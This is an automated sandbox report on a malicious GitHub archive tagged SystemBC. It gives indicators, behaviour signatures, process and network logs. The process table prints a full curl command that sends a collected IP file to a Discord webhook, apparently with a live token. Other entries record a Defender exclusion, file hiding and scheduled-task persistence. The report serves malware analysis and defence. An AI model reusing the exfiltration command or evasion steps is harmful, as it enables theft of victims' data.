URL:

https://codeload.github.com/l-urk/Beyond-Birthday/zip/refs/heads/main

Full analysis: https://app.any.run/tasks/8c9c073f-9971-4084-824a-ce548e9043b4
Verdict: Malicious activity
Threats:

SystemBC is a Remote Access Trojan (RAT) that can hide communication with the Command and Control server, and deposit other malware strains.

Analysis date: January 05, 2024, 20:46:08
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
systembc
Indicators:
MD5:

4C41F9D00C991A6C815D9DA8BE6A62B1

SHA1:

8AB02C3D5CBAB9974CD1A0E8892A3B53969CDA05

SHA256:

CDC4E71481A91B8DC1386E6E2A3E6D17D71E56BC4BCE1B937B8762DC3C70DAFC

SSDEEP:

3:N8X2EFQCrd5IClnbnWrycMAULNn:2m8QYbAMAULNn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 1776)
    • SYSTEMBC has been detected (YARA)

      • curl.exe (PID: 2500)
      • curl.exe (PID: 2332)
    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 2476)
    • Uses Task Scheduler to autorun other applications

      • cmd.exe (PID: 2476)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • bb.exe (PID: 2120)
      • 悪魔.exe (PID: 2924)
      • wscript.exe (PID: 880)
      • wscript.exe (PID: 2528)
      • cmd.exe (PID: 2476)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 1776)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 1776)
      • cmd.exe (PID: 2052)
      • cmd.exe (PID: 2476)
    • Executing commands from a ".bat" file

      • bb.exe (PID: 2120)
      • 悪魔.exe (PID: 2924)
      • wscript.exe (PID: 880)
      • wscript.exe (PID: 2528)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1776)
      • cmd.exe (PID: 2476)
    • Reads the Internet Settings

      • bb.exe (PID: 2120)
      • powershell.exe (PID: 1820)
      • 悪魔.exe (PID: 2924)
      • cmd.exe (PID: 2052)
      • wscript.exe (PID: 880)
      • wscript.exe (PID: 2528)
      • cmd.exe (PID: 2476)
      • powershell.exe (PID: 3072)
    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 1820)
      • powershell.exe (PID: 3072)
    • The process executes VB scripts

      • cmd.exe (PID: 2052)
      • cmd.exe (PID: 2476)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 880)
      • wscript.exe (PID: 2528)
    • Process uses IPCONFIG to discover network configuration

      • cmd.exe (PID: 3228)
    • Process uses IPCONFIG to get network configuration information

      • cmd.exe (PID: 2476)
  • INFO

    • The process uses the downloaded file

      • firefox.exe (PID: 1404)
      • WinRAR.exe (PID: 4040)
    • Application launched itself

      • firefox.exe (PID: 1404)
      • firefox.exe (PID: 2036)
      • cmd.exe (PID: 2476)
    • Checks supported languages

      • bb.exe (PID: 2120)
      • curl.exe (PID: 2500)
      • 悪魔.exe (PID: 2924)
      • curl.exe (PID: 2332)
      • curl.exe (PID: 2464)
      • curl.exe (PID: 2368)
      • curl.exe (PID: 696)
    • Manual execution by a user

      • WinRAR.exe (PID: 4040)
      • bb.exe (PID: 2120)
      • bb.exe (PID: 3928)
      • 悪魔.exe (PID: 2924)
      • cmd.exe (PID: 3136)
      • WinRAR.exe (PID: 980)
      • cmd.exe (PID: 2476)
      • notepad.exe (PID: 2028)
    • Drops the executable file immediately after the start

      • firefox.exe (PID: 1404)
      • WinRAR.exe (PID: 4040)
      • WinRAR.exe (PID: 980)
    • Create files in a temporary directory

      • bb.exe (PID: 2120)
      • 悪魔.exe (PID: 2924)
    • Reads the computer name

      • bb.exe (PID: 2120)
      • curl.exe (PID: 2500)
      • 悪魔.exe (PID: 2924)
      • curl.exe (PID: 2368)
      • curl.exe (PID: 2332)
      • curl.exe (PID: 696)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
102
Monitored processes
45
Malicious processes
9
Suspicious processes
1

Behavior graph

Click at the process to see the details
start firefox.exe no specs firefox.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs winrar.exe no specs bb.exe no specs bb.exe cmd.exe no specs attrib.exe no specs setx.exe no specs powershell.exe no specs #SYSTEMBC curl.exe 悪魔.exe no specs cmd.exe no specs attrib.exe no specs wscript.exe no specs cmd.exe no specs cmd.exe no specs systeminfo.exe no specs ipconfig.exe no specs #SYSTEMBC curl.exe cmd.exe no specs curl.exe no specs winrar.exe no specs cmd.exe attrib.exe no specs powershell.exe no specs ipconfig.exe no specs curl.exe wscript.exe no specs powershell.exe no specs cmd.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs wscript.exe no specs curl.exe notepad.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
452"C:\Windows\System32\WScript.exe" "C:\X\admin.vbs" C:\Windows\System32\wscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
532"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1404.0.49903424\552405535" -parentBuildID 20230710165010 -prefsHandle 1108 -prefMapHandle 1100 -prefsLen 28523 -prefMapSize 244195 -appDir "C:\Program Files\Mozilla Firefox\browser" - {18b03ee6-9c15-4bcb-8a68-e18d9b933772} 1404 "\\.\pipe\gecko-crash-server-pipe.1404" 1180 d8a76b0 gpuC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
1
Version:
115.0.2
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msasn1.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
696curl -X POST -H "Content-Type: multipart/form-data" -F "file=@C:\X\ip.txt" -F "content=Hook Success" https://discord.com/api/webhooks/1119986264817553416/-yJPV2p7CQrs2kKaVltylTGa8v6uYXlGw20d6YbMRihp2NOLN39GIHjy721xvJ1OkdoH C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.5.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
844attrib +h C:\Users\admin\.lC:\Windows\System32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Attribute Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ulib.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
880"C:\Windows\System32\WScript.exe" "C:\Users\admin\A2\悪魔2.vbs" C:\Windows\System32\wscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
980"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\Beyond-Birthday-main\akuma.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
1232attrib +h C:\Users\admin\A2C:\Windows\System32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Attribute Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ulib.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1344"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1404.1.1264707787\1449586058" -parentBuildID 20230710165010 -prefsHandle 1404 -prefMapHandle 1400 -prefsLen 28600 -prefMapSize 244195 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0cc29a4-ff9a-4374-987e-97a03c6f38d7} 1404 "\\.\pipe\gecko-crash-server-pipe.1404" 1416 c7858a0 socketC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
0
Version:
115.0.2
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msasn1.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
1388"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1404.3.220500233\884175715" -childID 2 -isForBrowser -prefsHandle 2768 -prefMapHandle 2764 -prefsLen 34225 -prefMapSize 244195 -jsInitHandle 864 -jsInitLen 240908 -parentBuildID 20230710165010 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f47f153-f919-4150-a207-c810deaf874b} 1404 "\\.\pipe\gecko-crash-server-pipe.1404" 2780 16379b20 tabC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
0
Version:
115.0.2
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msasn1.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
1404"C:\Program Files\Mozilla Firefox\firefox.exe" https://codeload.github.com/l-urk/Beyond-Birthday/zip/refs/heads/mainC:\Program Files\Mozilla Firefox\firefox.exe
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
0
Version:
115.0.2
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msasn1.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
Total events
16 988
Read events
16 818
Write events
170
Delete events
0

Modification events

(PID) Process:(2036) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\Launcher
Operation:writeName:C:\Program Files\Mozilla Firefox\firefox.exe|Launcher
Value:
2166C0A101000000
(PID) Process:(1404) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\Launcher
Operation:writeName:C:\Program Files\Mozilla Firefox\firefox.exe|Browser
Value:
044CC1A101000000
(PID) Process:(1404) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\Launcher
Operation:writeName:C:\Program Files\Mozilla Firefox\firefox.exe|Telemetry
Value:
0
(PID) Process:(1404) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\DllPrefetchExperiment
Operation:writeName:C:\Program Files\Mozilla Firefox\firefox.exe
Value:
0
(PID) Process:(1404) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\PreXULSkeletonUISettings
Operation:writeName:C:\Program Files\Mozilla Firefox\firefox.exe|Theme
Value:
1
(PID) Process:(1404) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\PreXULSkeletonUISettings
Operation:writeName:C:\Program Files\Mozilla Firefox\firefox.exe|Enabled
Value:
1
(PID) Process:(1404) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\Default Browser Agent
Operation:writeName:C:\Program Files\Mozilla Firefox|DisableTelemetry
Value:
1
(PID) Process:(1404) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\Default Browser Agent
Operation:writeName:C:\Program Files\Mozilla Firefox|DisableDefaultBrowserAgent
Value:
0
(PID) Process:(1404) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\Default Browser Agent
Operation:writeName:C:\Program Files\Mozilla Firefox|SetDefaultBrowserUserChoice
Value:
1
(PID) Process:(1404) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\Default Browser Agent
Operation:writeName:C:\Program Files\Mozilla Firefox|AppLastRunTime
Value:
D14E5F3C23B0D901
Executable files
6
Suspicious files
112
Text files
52
Unknown types
0

Dropped files

PID
Process
Filename
Type
1404firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal
MD5:
SHA256:
1404firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\startupCache\urlCache-current.binbinary
MD5:B7A3C61D0C144CC5E166B1E769CA8F8C
SHA256:7FADCB77FFACA6B9E9F15C6F1CD3AAD4C20DCD90FA92429A627A3A7110CA2644
1404firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmbinary
MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
1404firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.jsonbinary
MD5:EA8B62857DFDBD3D0BE7D7E4A954EC9A
SHA256:792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA
1404firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json.tmpbinary
MD5:EA8B62857DFDBD3D0BE7D7E4A954EC9A
SHA256:792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA
1404firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmbinary
MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
1404firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs-1.jstext
MD5:60E0DE9E05EC76C749D80F0D15A81B21
SHA256:08252FA62CCCCD316474E20CC7317A6B5C932B2C972234318E8CCDA39EC2EF48
1404firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmbinary
MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
1404firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\startupCache\scriptCache-new.bin
MD5:
SHA256:
1404firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\startupCache\scriptCache.bin
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
23
TCP/UDP connections
56
DNS requests
219
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1404
firefox.exe
GET
200
34.107.221.82:80
http://detectportal.firefox.com/canonical.html
unknown
text
90 b
unknown
1404
firefox.exe
GET
200
34.107.221.82:80
http://detectportal.firefox.com/success.txt?ipv4
unknown
text
8 b
unknown
1404
firefox.exe
POST
200
192.229.221.95:80
http://ocsp.digicert.com/
unknown
binary
313 b
unknown
1404
firefox.exe
POST
200
192.229.221.95:80
http://ocsp.digicert.com/
unknown
binary
313 b
unknown
1404
firefox.exe
POST
200
142.251.39.3:80
http://ocsp.pki.goog/gts1c3
unknown
binary
471 b
unknown
1404
firefox.exe
POST
200
13.32.1.186:80
http://ocsp.r2m02.amazontrust.com/
unknown
binary
471 b
unknown
1404
firefox.exe
POST
200
104.83.4.146:80
http://r3.o.lencr.org/
unknown
binary
503 b
unknown
1404
firefox.exe
POST
200
104.83.4.146:80
http://r3.o.lencr.org/
unknown
binary
503 b
unknown
1404
firefox.exe
POST
200
104.83.4.146:80
http://r3.o.lencr.org/
unknown
binary
503 b
unknown
1404
firefox.exe
POST
200
104.83.4.146:80
http://r3.o.lencr.org/
unknown
binary
503 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1404
firefox.exe
140.82.121.9:443
codeload.github.com
GITHUB
US
unknown
1404
firefox.exe
34.107.221.82:80
detectportal.firefox.com
GOOGLE
US
whitelisted
1404
firefox.exe
54.224.19.170:443
spocs.getpocket.com
AMAZON-AES
US
unknown
1404
firefox.exe
34.117.237.239:443
contile.services.mozilla.com
GOOGLE-CLOUD-PLATFORM
US
unknown
1404
firefox.exe
34.149.100.209:443
firefox.settings.services.mozilla.com
GOOGLE
US
unknown
1404
firefox.exe
142.250.184.234:443
safebrowsing.googleapis.com
GOOGLE
US
whitelisted
1404
firefox.exe
34.107.243.93:443
push.services.mozilla.com
GOOGLE
US
unknown
1404
firefox.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
codeload.github.com
  • 140.82.121.9
whitelisted
detectportal.firefox.com
  • 34.107.221.82
whitelisted
contile.services.mozilla.com
  • 34.117.237.239
whitelisted
spocs.getpocket.com
  • 54.224.19.170
shared
firefox.settings.services.mozilla.com
  • 34.149.100.209
whitelisted
safebrowsing.googleapis.com
  • 142.250.184.234
whitelisted
push.services.mozilla.com
  • 34.107.243.93
whitelisted
example.org
  • 93.184.216.34
whitelisted
ipv4only.arpa
  • 192.0.0.170
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted

Threats

PID
Process
Class
Message
1080
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
2332
curl.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
696
curl.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
No debug info